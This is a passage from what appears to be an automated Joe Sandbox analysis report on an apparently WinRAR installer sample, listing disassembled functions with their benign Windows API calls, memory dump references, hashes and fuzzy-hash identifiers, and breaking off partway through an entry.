Opcode Fuzzy Hash: b1a589d711ce5c113e8e4a51647d4a5db0ae59c4c3c3c73f71d1b0031afe7af5
Instruction Fuzzy Hash: 03314B20E0C20746FA64AF25A493FB92391AF7378AF444434D9CEEF2D7DE2DB8048651

Function 00007FF6C3BA0CB8 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF6C3BA0B8F,?,?,?,?,00000000,00007FF6C3B9F09E), ref: 00007FF6C3BA0CE0
ReadFile.KERNEL32 ref: 00007FF6C3BA0CFF
GetLastError.KERNEL32 ref: 00007FF6C3BA0D33
GetLastError.KERNEL32 ref: 00007FF6C3BA0D52

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 8101a7d1bdd2c023f2f94ac8423880c59af0b93fe812d6a548fd58d45e480cb0
Instruction ID: 20e642447c774eabfa6365135316a01603a39bb5c39a7316dfea8011174dc6c8
Opcode Fuzzy Hash: 8101a7d1bdd2c023f2f94ac8423880c59af0b93fe812d6a548fd58d45e480cb0
Instruction Fuzzy Hash: 2B219532A18E4181EA605F21B801BB9A350BB66B96F144131DEDDE6689CF3CF4848740

Function 00007FF6C3B911C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32 ref: 00007FF6C3B911EB
SHBrowseForFolderW.SHELL32 ref: 00007FF6C3B91228

Part of subcall function 00007FF6C3BA39B8: SHGetPathFromIDListW.SHELL32 ref: 00007FF6C3BA39E8

Strings

A, xrefs: 00007FF6C3B91220

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: BrowseFolderFromListMallocPath
String ID: A
API String ID: 2332185071-3554254475
Opcode ID: b00eb2558a74acd322b513043997ce8e923ceda0cdca6b51de8298474a559cb6
Instruction ID: 2dce2dd653e334d0b3860c61311770f41a6c634073de60d03ea92be310c0e3bf
Opcode Fuzzy Hash: b00eb2558a74acd322b513043997ce8e923ceda0cdca6b51de8298474a559cb6
Instruction Fuzzy Hash: DF119466A18B8586EB509F11F48676AB3B4FBAABD5F400130DACD87B54DF3CD048CB40

Function 00007FF6C3BA6458 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA645E
FindResourceW.KERNEL32(?,?,?,?,00007FF6C3BA5B30), ref: 00007FF6C3BA6474

Strings

RTL, xrefs: 00007FF6C3BA646A

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 3fe9193610b2b954ca747a9453040e17f244332993db366b631c7d02911bbf0e
Instruction ID: fa8010019c228927b66bb693c9e0df26eb22e84dd59210a6032b030e4f785d8c
Opcode Fuzzy Hash: 3fe9193610b2b954ca747a9453040e17f244332993db366b631c7d02911bbf0e
Instruction Fuzzy Hash: FFE01214F09B4282EA08AB1668676743B905FABB83F544478C9CE92768DD7CA2488B40

Function 00007FF6C3BCA544 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF6C3BCA586

Strings

, xrefs: 00007FF6C3BCA5C9

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 789a4126fd2d51ccc01158b3c7840c3a71ce060e94776f7cb552cb3a58c115b4
Instruction ID: aea0b08f11d83dbea7f3ed70718c2ebf38c57d909be16f88c04a6999016d5dd2
Opcode Fuzzy Hash: 789a4126fd2d51ccc01158b3c7840c3a71ce060e94776f7cb552cb3a58c115b4
Instruction Fuzzy Hash: 6551CF32A1C6C18AE7219F24E085BAE7BA0F75A389F54413AD7CD97A86CF7CD145CB00

Function 00007FF6C3BCB458 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 00007FF6C3BCB529

Strings

LCMapStringEx, xrefs: 00007FF6C3BCB474, 00007FF6C3BCB485

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 613a1c34520167f2aa5f946c31bc094c4d5f9712b6e2a61671e31258b46fd4f4
Instruction ID: 58fa23d9c574df948f17ed23268c29d1604826af8b82a796c1c42a805bfc7353
Opcode Fuzzy Hash: 613a1c34520167f2aa5f946c31bc094c4d5f9712b6e2a61671e31258b46fd4f4
Instruction Fuzzy Hash: C0212C35708B8186DB64CF16F441AAAB7A4FB9ABC0F444136EACD93B19DF3CD5408B00

Function 00007FF6C3BCB3E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000003,00007FF6C3BC8AB1), ref: 00007FF6C3BCB442

Strings

InitializeCriticalSectionEx, xrefs: 00007FF6C3BCB40D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 19fc9a1f5a494f31fae254fb8f71d4e9c6c503fc6ba75a204470776c44fbeb90
Instruction ID: cb07a1a2f977c488c4f5cda44fdcad6b3578a58b0e8d6b0c8a23f01a517a1dbd
Opcode Fuzzy Hash: 19fc9a1f5a494f31fae254fb8f71d4e9c6c503fc6ba75a204470776c44fbeb90
Instruction Fuzzy Hash: 18F09025B1C75182E6149F06B1428B96361BFAAB82F984432EEDEA3B5CCE3CD8458740

Function 00007FF6C3B91B5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6C3B91B67

Strings

vector too long, xrefs: 00007FF6C3B91B60

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: vector too long
API String ID: 909987262-2873823879
Opcode ID: 58dd6565d243c12ffd826aaa6e7cddf247264d1edcd646189a72e4815745d427
Instruction ID: 970c0e73e201ee2d74150896293056dcf9614691574f62e5eed18354a603664e
Opcode Fuzzy Hash: 58dd6565d243c12ffd826aaa6e7cddf247264d1edcd646189a72e4815745d427
Instruction Fuzzy Hash: 4CE04F36A05F8592D61CAF51F5824987374EB69780F648931D7DC4BB65DF38E1B18700

Function 00007FF6C3BCAADC Relevance: 3.2, APIs: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6C3BCA42C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6C3BCA768), ref: 00007FF6C3BCA456

IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6C3BCA899), ref: 00007FF6C3BCAB49
GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6C3BCA899), ref: 00007FF6C3BCAB8D

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 5d6f11de72f5d3909ae7cdef260ed5fab4dc2d1caac9d7e27b3f9ee4a98ada73
Instruction ID: 0aeee1095f19f9a8ff122fc85a942833f22f93e86897342dca1f7ec9d941fddb
Opcode Fuzzy Hash: 5d6f11de72f5d3909ae7cdef260ed5fab4dc2d1caac9d7e27b3f9ee4a98ada73
Instruction Fuzzy Hash: 0381F362A0C68256EB74AF29F45297977A1FB667C3F484132C6CEE7694DE3CE941C300

Function 00007FF6C3BA0DA8 Relevance: 3.1, APIs: 2, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,?,?,00007FF6C3BA0FB5,?,?,?,00007FF6C3B9E89F), ref: 00007FF6C3BA0EDC
GetLastError.KERNEL32(?,00000000,?,?,?,00007FF6C3BA0FB5,?,?,?,00007FF6C3B9E89F), ref: 00007FF6C3BA0EEB

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1a7a98b1cb141f238a1d592e334d5214f335a2260eb98e24dc522bcfc7e70dd7
Instruction ID: 995c8f78d582d8e5fa72473af5393831be7e62a6caa9341f6ffa607301534652
Opcode Fuzzy Hash: 1a7a98b1cb141f238a1d592e334d5214f335a2260eb98e24dc522bcfc7e70dd7
Instruction Fuzzy Hash: 3D31B622F19E4A82EA604F29D542EF96350AF26BD6F044131DEDDA7BD4DF3DE4819700

Function 00007FF6C3BAAD40 Relevance: 3.1, APIs: 2, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF6C3BAAD8F
LoadLibraryW.KERNEL32 ref: 00007FF6C3BAADF9

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 3245ba2793be4fba06aa236f857d8204ba1a07326754a835ada1c1679b041746
Instruction ID: 75b1dfc09a108388be4bd51fdb11221c658b616ff127c465d36949078b182e35
Opcode Fuzzy Hash: 3245ba2793be4fba06aa236f857d8204ba1a07326754a835ada1c1679b041746
Instruction Fuzzy Hash: 87212422F09A45A9EB10EFB1D4A25ED7370EFB6785F810031D9DDE769ADE28D509C340

Function 00007FF6C3BB0190 Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00007FF6C3BB01E7
CopyRect.USER32 ref: 00007FF6C3BB0208

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Rect$ClientCopy
String ID:
API String ID: 1880273418-0
Opcode ID: 4c4c53f5941366ca05170129574d2302a37d8930208409adda015816e1e6f880
Instruction ID: 78e29bb894e9225d2c6d69be3ce2364552777f7f34fb55ce8f7d7e0632aade8b
Opcode Fuzzy Hash: 4c4c53f5941366ca05170129574d2302a37d8930208409adda015816e1e6f880
Instruction Fuzzy Hash: CA214773610B848AEB10CF26E49576AB7A0F349BAAF048121DB8D47711DF3DD4A5CB40

Function 00007FF6C3BA0F00 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32 ref: 00007FF6C3BA0F5C
GetLastError.KERNEL32 ref: 00007FF6C3BA0F69

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ea7845a602860c14d0a46e4b99b46f81841b6815f05ce2a60d14a5b1042bce38
Instruction ID: 573a011d92bd58584db3805b8a77bc5409aa2363b273c0caf3048aa76290f93b
Opcode Fuzzy Hash: ea7845a602860c14d0a46e4b99b46f81841b6815f05ce2a60d14a5b1042bce38
Instruction Fuzzy Hash: BD113621A1CB4281EB508F25A4426FD6360AB66BB5F544331EAFDB62D5CF3ED546C340

Function 00007FF6C3BA160C Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1630
GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1666

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0d029f1be65e0e5603c0bace5cacd859890830e7664a4b3eca3c0019234412f5
Instruction ID: 9ddc44c7dec9292acb1dc0fc3139d146ed19e81ce7e113c990a26601698f4512
Opcode Fuzzy Hash: 0d029f1be65e0e5603c0bace5cacd859890830e7664a4b3eca3c0019234412f5
Instruction Fuzzy Hash: 75017C22E08B4142EA50EF64B4924B973B1AFAA796F400230EADDDB7A6DF2CD5048640

Function 00007FF6C3BAB038 Relevance: 3.0, APIs: 2, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C3BAB08D,?,?,?,?,00007FF6C3BA3392,?,?,?,00007FF6C3BA331D), ref: 00007FF6C3BAB03C
GetProcessAffinityMask.KERNEL32 ref: 00007FF6C3BAB04F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 365564994351043c0f6da4208c40dc7667041a7c1eea9d086d56b8e935f100ff
Instruction ID: e749d78891319b5c1f207b2afd164b94f8edf4b350b1ea11055b55a6727c72a9
Opcode Fuzzy Hash: 365564994351043c0f6da4208c40dc7667041a7c1eea9d086d56b8e935f100ff
Instruction Fuzzy Hash: 82E02B61B28D4282DF18CF56D4518E9A3A1BFD5B40F848135D58AD3618DE3DE1458700

Function 00007FF6C3BB933C Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C3BB936C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C3BB9372

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: bc0fdb01dbfb434e58cf2365e6a908ffa1f7cd0ad636dfdceae47a03319cbbbf
Instruction ID: 81ba8b245e9ff96733cd2a9d3d66b8d5ae56b7e0b780fa5a32f303e6d7a9bfe1
Opcode Fuzzy Hash: bc0fdb01dbfb434e58cf2365e6a908ffa1f7cd0ad636dfdceae47a03319cbbbf
Instruction Fuzzy Hash: CBE0EC10E1910B46F9683E6356978B921440F7B77AF5C1B30DAFEEC2C2BE1CF5914960

Function 00007FF6C3B92280 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C3B922AE
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6C3B922B4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: da961a74296a8bf94e293d096c062b8a1162fd65afa57d4769f7f2f1c1c3535b
Instruction ID: 0cdfda36d4134d3ad3faed4a6e69a2d5351be57fd447e305419fa48a92197d5c
Opcode Fuzzy Hash: da961a74296a8bf94e293d096c062b8a1162fd65afa57d4769f7f2f1c1c3535b
Instruction Fuzzy Hash: 35E0B655E06B0E45EC18BFA5909746922A04F76731F500B38D6FD5E7D2EE2CA4528240

Function 00007FF6C3BC7738 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,00007FF6C3BC6677,00007FF6C3BCC272,?,?,?,00007FF6C3BCC2AF,?,?,00000000,00007FF6C3BCC775,?,?,?,00007FF6C3BCC6A7), ref: 00007FF6C3BC774E
GetLastError.KERNEL32(?,?,00007FF6C3BC6677,00007FF6C3BCC272,?,?,?,00007FF6C3BCC2AF,?,?,00000000,00007FF6C3BCC775,?,?,?,00007FF6C3BCC6A7), ref: 00007FF6C3BC7758

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: bdcbbbac8bc649d91a31b8b1baa2a0a3f58ed80174029fac62ed563795f0ed95
Instruction ID: 9942b85b44e60869a9e2517df58e8ad2f1ba4539b7d6008bdfdd3b7a80b6e4e2
Opcode Fuzzy Hash: bdcbbbac8bc649d91a31b8b1baa2a0a3f58ed80174029fac62ed563795f0ed95
Instruction Fuzzy Hash: D1E08C50F096064BFF28BFB2B8978B822955FBA703B044431C8CDE3291DF3C68858710

Function 00007FF6C3BBC7DC Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

__vcrt_FlsAlloc.LIBVCRUNTIME ref: 00007FF6C3BBC7E7
__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6C3BBC817

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
